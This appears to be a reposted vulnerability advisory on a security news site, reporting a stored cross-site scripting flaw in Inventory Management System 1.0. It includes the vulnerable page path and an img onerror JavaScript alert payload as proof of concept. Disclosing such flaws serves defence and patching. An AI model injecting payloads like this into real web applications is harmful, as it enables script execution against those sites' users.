Home Tools Exploits & CVE's Inventory Management System 1.0 Cross Site Scripting

Inventory Management System 1.0 Cross Site Scripting

March 21, 2022

771

Inventory Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

## Title: Inventory Management System 1.0 XSS Stored 
## Author: Hejap Zairy
## Date: 12.07.2022
## Vendor: https://www.vetbossel.in/inventory-management-system-php/
## Software: https://cutt.ly/lOZ8lrr
## Reference: https://github.com/Matrix07ksa
# Tested on: ArchLinux, MySQL, Apache

## Description:
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.

Status: CRITICAL
[+] Payloads:
```
https://0day_script.gov//Inventory_Modify.php
<img src=1 href=1 onerror="javascript:alert('HEJAP ZAIRY AL-SHARIF')"></img>
```

## Proof and Exploit:
https://streamable.com/4v5h6u

Inventory Management System 1.0 Cross Site Scripting

Follow us on Instagram @thecyberpost

EDITOR PICKS

Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication Bypass

Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Insecure Direct Object...

Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Seattle Lab Mail 5.5 Denial Of Service

Lucee Administrator imgProcess.cfm Arbitrary File Write

Cacti 1.2.22 Command Injection